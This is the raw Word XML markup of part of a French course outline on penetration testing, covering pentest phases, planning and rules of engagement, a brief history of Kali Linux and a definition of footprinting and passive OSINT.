          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 3 - Les phases d’un test d’intrusion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E14C0A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152ED8B4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413C264A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Planification </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B95C7DD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C214119" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reconnaissance </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CB57CA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Cette étape consiste à comprendre les besoins et les objectifs du pentest. Le testeur doit recueillir des infos sur la </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cible:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF3B606" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>son architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399AF59F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ses systèmes d’exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CDAEE7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>ses applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB9B19" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ses protocoles de communication, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939FD5A" w14:textId="7A04F4B6" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>ses</w:t>
      </w:r>
      <w:r w:rsidR="00BD3814">
        <w:t xml:space="preserve"> n </w:t>
      </w:r>
      <w:r>
        <w:t>points d'entrée potentiels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B9356B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C432DE7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Analyse de vulnérabilités</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7844BD33" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette étape consiste à identifier les vulnérabilités et les faiblesses de la cible. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B35E8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EEFB9CF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation des vulnérabilités et Post-exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB7FA57" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Une fois les vulnérabilités identifiées, le testeur doit les exploiter pour déterminer si elles peuvent accéder à des systèmes ou à des données sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BB00C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="196DB166" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Elaboration de rapports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B6542" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette étape consiste à documenter les résultats du pentest et à les présenter sous forme de rapports. Les rapports doivent être clair, précis et bien structurés. Les rapports doivent inclure des détails sur la méthodologie, les outils utilisés, les vulnérabilités identifiées et les recommandations de sécurité. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A8483B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE7BC33" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nettoyage et suivi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082BD649" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le testeur doit nettoyer tout code malveillant ou autre artefact laissé sur la cible. Le testeur doit également suivre les recommandations fournies dans le rapport pour garantir la sécurité. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C85543" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647B9B4B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75016FAC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53261B1C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77EAE44D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="094543BB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414403D2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_xgiyavet30m4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="26"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Chapitre  4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Planification et préparation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6953738A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="418476AF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Cette phase consiste à définir les objectifs du pentest, à obtenir les autorisations nécessaires et à établir une feuille de route pour les activités à </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>venir:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C9F397" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0B929D6F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>identification des objectifs et des attentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AE59EF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les parties prenantes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BCD88D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les limites du test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CC71EF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les règles d’engagement (ROE) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563BE06C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les équipes de travail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D8027" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les procédures à suivre</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CA27BE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Des réunions de travail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76637A1D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="61509F6C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6D00D9DC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="54B2AEC7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="65E7EAD2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0D287506" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="641E2EE2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="74F98DC8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="24C13143" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="228B97B5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6047AF5A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="391EFD2B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_umhyu8voblrp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Module 3 - Présentation de la suite Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E31C8E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CB6DCB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_upz7pigiajdh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Chapitre 1 - Histoire de Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FE879" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C66118" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>2006</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Naissance de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>BackTrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : distribution regroupant l’ensemble des outils nécessaires au test de sécurité d’un réseau qui est reconnu par les professionnels de la sécurité informatique comme outil complet, développé par la société </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Remote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploité par les développeurs Mati </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aharoni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et Max Moser. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D87A836" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C’est un logiciel open source (logiciel libre). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D1F4B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B66DDE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>2013</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - La distribution </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>BackTrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> devient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, développe Mati </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aharoni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> qui crée la société Offensive Security et les développeurs Devon Kearns et Raphaël Hertzog. La distribution regroupe l’ensemble des outils nécessaires aux tests de sécurité d’un système informatique, surtout le test d’intrusion. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA1AD85" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8AB948" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_4q1kwst2l7zc" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Chapitre 2 -Installation et configuration de Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F2E3A3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3813ADF2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 - Choisir la version en fonction de son ordinateur (I386 ou </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>AMD )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6604EC90" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F42D5F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637D8647" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="619539CB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_8todvzo98ddq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 4 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Footprint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> et reconnaissance </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D6FF15" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="37049668" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_utv4my7z79hw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 1 - Définition du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460ADC16" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="29AA1CB3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : est la technique qui consiste à récolter de l’info sur des systèmes informatiques et toutes les entités auxquelles ils sont rattachés. Cela est effectué par le biais de plusieurs techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1BB74C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0853C843" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Requêtes sur l’organisation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11366A51" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F994CD6" w14:textId="3A7BF9B4" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Requêtes réseau (</w:t>
      </w:r>
      <w:r w:rsidR="000E037B">
        <w:t>des sites privés</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sont capables de récupérer des informations de routeurs si ceci sont en partage d’informations) </w:t>
      </w:r>
      <w:r w:rsidR="000E037B">
        <w:t xml:space="preserve">(analyse des sites public de la cible) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0E9A2" w14:textId="77777777" w:rsidR="000E037B" w:rsidRDefault="000E037B" w:rsidP="000E037B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F467B31" w14:textId="77777777" w:rsidR="000E037B" w:rsidRDefault="000E037B" w:rsidP="000E037B"/>
    <w:p w14:paraId="1D2BA486" w14:textId="3C7652F2" w:rsidR="000E037B" w:rsidRPr="000E037B" w:rsidRDefault="000E037B" w:rsidP="000E037B">
      <w:pPr>
        <w:pStyle w:val="Citationintense"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La collecte d’information est toujours passive (dans le cadre du pan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67259C69" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="28EE4CED" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5909DF56" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6AC9CBC5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_aue9qzjzge9x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Chapitre 2 - Collecte de l’information et OSINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B2320" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>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23B72" w14:paraId="5A040362" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0C9F6575" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>La collecte d’informations se fera de manière passive, sans interaction directe avec la cible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6702A42F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
